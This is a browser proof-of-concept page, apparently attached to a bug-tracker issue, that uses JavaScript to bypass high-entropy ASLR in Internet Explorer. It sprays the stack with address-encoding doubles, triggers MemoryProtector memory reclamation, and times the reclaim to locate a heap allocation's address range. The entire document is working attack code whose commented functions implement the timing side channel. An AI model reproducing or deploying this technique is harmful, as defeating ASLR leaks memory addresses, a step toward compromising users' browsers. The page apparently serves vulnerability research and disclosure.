
Issue 445 attachment: heaslr_bypass_via_memoryprotector.html (5.0 KB)

<html>
<head>
<script>

// Shared state for the timing experiment.
// `button` is a detached <button> element; its title attribute is
// reassigned in free() below to force string allocations/frees.
// The three strings are built once up front so the timed section in
// free() does nothing but the attribute assignment.  Array(n).join(c)
// yields a string of n-1 copies of c.
var button = document.createElement("button");
var s_large = Array((0x100000 - 0x1000) / 2).join("a"); // 0x7F7FF chars
var s_small1 = Array(20).join("b"); // 19 chars
var s_small2 = Array(20).join("c"); // 19 chars

// Trigger MemoryProtector::ReclaimMemory by freeing a large object
// and measure the time it takes.
// Replaces button.title three times in a fixed order and times the last
// assignment, which (per the original author's observation) is the one
// on which MemoryProtector::ReclaimMemory runs.
// Returns the elapsed time of that assignment in milliseconds
// (window.performance.now() resolution).
function free() {
  // Install the large string first; the next assignment frees it.
  button.title = s_large;

  // The reclaim is reported not to trigger on this free (the one that
  // releases the large string, well above the stated threshold) but on
  // the one after it.  Original note: this might be a bug; if MS changes
  // this behaviour, remove this line and revisit the threshold in go().
  button.title = s_small1;

  var t0 = window.performance.now();
  button.title = s_small2; // the timed free
  var t1 = window.performance.now();

  return t1 - t0;
}

// Tests if the allocation happens in the memory range between min and max
// by spraying the stack with addresses in [min, max] range and triggering MemoryProtector.
// Probes the address window [min, max): fills the stack with doubles
// whose bit patterns are the candidate addresses, then calls free() and
// returns the time that free() measured.
// Parameters: min, max - numeric addresses (max exclusive).
// Returns: the millisecond timing reported by free().
function test(min, max) {
// Scratch object holding the probe state (cur/min/max/depth/ret) and the
// two closures below; everything is accessed through `this`.
var o = new Object();

// Converts the next untested address to its double (IEEE 754) representation.
// Advances this.cur by one page (0x1000) per call.
o.getNextDouble = function() {
// All relevant values are going to be subnormal
// so the conversion is a simple matter of multiplying
// with a constant: 4.94e-324 is the smallest positive subnormal
// (2^-1074), so N times it is the double whose raw bit pattern is N
// (valid while N fits in the 52-bit mantissa).
// NOTE(review): `cur` is assigned without `var` and so leaks as an
// implicit global; left untouched here because this code is sensitive
// to the exact frame layout.
cur = this.cur;
this.cur += 0x1000;
return 4.9406564584124654E-324 * cur;
}

// Recurses until this.cur reaches this.max, then calls free() and stores
// the measured time in this.ret.  Each level evaluates 32 getNextDouble()
// calls whose results stay live as operands of the nested multiplication
// while the next level runs -- that is the "spray".  The shape of this
// expression is deliberate; do not refactor it into a loop.
// With range_size = 0x4000000 from go() this is roughly 512 levels deep.
o.recursive = function() {
this.depth += 1;
if(this.cur >= this.max) {
//alert(this.depth);
this.ret = free();
return 1;
} else {
// Spray the stack
return (
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
(this.getNextDouble() *
this.recursive())))))))))))))))))))))))))))))))));
}
}


o.depth = 0;
o.min = min;
o.max = max;
// Start a little above min; the original author's note below suggests
// the offset depends on the pointer width of the target process.
o.cur = min + 0x40; //change to 0x20 if testing on 32-bit IE process.

// Kick off the recursion; the timing ends up in o.ret.
o.recursive();

return o.ret;
}

// Comparator function for sorting the address ranges.
/**
 * Array.prototype.sort comparator: orders range records by their
 * measured `time`, ascending (fastest first).
 * @param {{time: number}} a
 * @param {{time: number}} b
 * @returns {number} negative if a is faster, positive if slower, 0 if equal
 */
function compare_ranges(a, b) {
  var delta = a.time - b.time;
  return delta;
}

// Measures the time taken for each range.
// Runs test() for every range record in place, storing the measured
// time in each record's `time` field.  Returns nothing.
// @param {Array<{min: number, max: number, time: number}>} ranges
function test_ranges(ranges) {
  var count = ranges.length;
  for (var idx = 0; idx < count; idx++) {
    var range = ranges[idx];
    range.time = test(range.min, range.max);
  }
}

// Main function
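// Main function: onclick handler of the page's single button.
// Builds the list of address ranges, times each one via test_ranges(),
// sorts them by time and writes a report into the #result element.
// Side effect: DOM write to #result.  Returns nothing.
// Fixes vs. the original: `ranges` and `ret_str` were implicit globals,
// the fake-range removal hard-coded 50 instead of num_fake_ranges, and a
// statement lacked its terminating semicolon.
function go() {
  var min = 0; // Minimum address to test
  var max = 0x10000000000; // Maximum address to test

  var range_size = 0x4000000;
  var num_fake_ranges = 50;

  // The runner-up's time must exceed the fastest range's time by this
  // factor before the run is reported as a detection.
  var threshold = 1.2;

  var start_time = window.performance.now();

  // Prepare the ranges array.
  // Fake ranges (all covering the same fixed window) are placed first so
  // that the timings stabilise before the "real ones" are measured.
  // NOTE: (max - min) must be a whole multiple of range_size; otherwise
  // num_ranges is fractional and `new Array` throws a RangeError.
  var num_ranges = (max - min) / range_size;
  var ranges = new Array(num_ranges + num_fake_ranges);
  var i;
  for (i = 0; i < num_fake_ranges; i++) {
    ranges[i] = { min: 0x33, max: range_size + 0x33, time: 0 };
  }
  for (i = 0; i < num_ranges; i++) {
    ranges[i + num_fake_ranges] = { min: min + i * range_size, max: min + (i + 1) * range_size, time: 0 };
  }

  // Do the timing tests.
  test_ranges(ranges);

  // Remove the fake ranges; use the constant so the two stay in sync.
  ranges.splice(0, num_fake_ranges);

  // Sort according to timing, fastest first.
  ranges.sort(compare_ranges);

  var end_time = window.performance.now();
  var run_time = (end_time - start_time) / 1000;

  // Check if the experiment was conclusive: the fastest range has to be
  // clearly ahead of the second fastest.
  var ret_str;
  if (ranges[0].time * threshold < ranges[1].time) {
    ret_str = "Memory allocation detected in the range [0x" + ranges[0].min.toString(16) + ", 0x" + ranges[0].max.toString(16) + "].<br>";
  } else {
    ret_str = "Results inconclusive, try again.<br>";
  }
  ret_str += "Tests took " + run_time.toString() + " seconds.<br>";
  ret_str += "<br>Details:<br>";
  for (i = 0; i < ranges.length; i++) {
    ret_str += "Range: [0x" + ranges[i].min.toString(16) + ", 0x" + ranges[i].max.toString(16) + "], time(ms): " + ranges[i].time + "<br>";
  }

  // The report is assembled only from numbers this function formatted
  // itself, so innerHTML carries no external input; keep it that way if
  // the report is ever extended.
  document.getElementById("result").innerHTML = ret_str;
}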

</script>
</head>
<body>
<button onclick="go()">Dude, where's my heap?</button>
<div id="result"></div>
</body>
</html>